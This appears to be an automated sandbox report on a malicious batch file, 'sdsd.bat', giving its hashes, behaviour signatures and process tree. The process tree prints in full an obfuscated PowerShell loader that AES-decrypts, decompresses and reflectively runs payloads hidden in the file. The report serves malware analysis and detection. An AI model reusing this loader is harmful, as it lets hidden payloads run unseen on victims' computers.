Analysis
-
max time kernel
21s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
12-06-2024 22:23
Static task
static1
Behavioral task
behavioral1
Sample
sdsd.bat
Resource
win7-20240611-en
windows7-x64
4 signatures
30 seconds
General
-
Target
sdsd.bat
-
Size
399KB
-
MD5
dedc70c320233bc67ceb02a9492f29d6
-
SHA1
d031a05a302501a50581a2338762013f60da62df
-
SHA256
c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a
-
SHA512
776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e
-
SSDEEP
6144:QpmLNVyxXtQ5MtZl5HaSAcfGoPTT5rYwZVYVwmmkcPW0oLCol6w1w/apK0/X0DC:Qga9t8Mt/HA4T9be9mfu0oZ6ziD/EG
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1748 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1748 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2208 wrote to memory of 2228 2208 cmd.exe 29 PID 2208 wrote to memory of 2228 2208 cmd.exe 29 PID 2208 wrote to memory of 2228 2208 cmd.exe 29 PID 2208 wrote to memory of 1748 2208 cmd.exe 30 PID 2208 wrote to memory of 1748 2208 cmd.exe 30 PID 2208 wrote to memory of 1748 2208 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\sdsd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748
-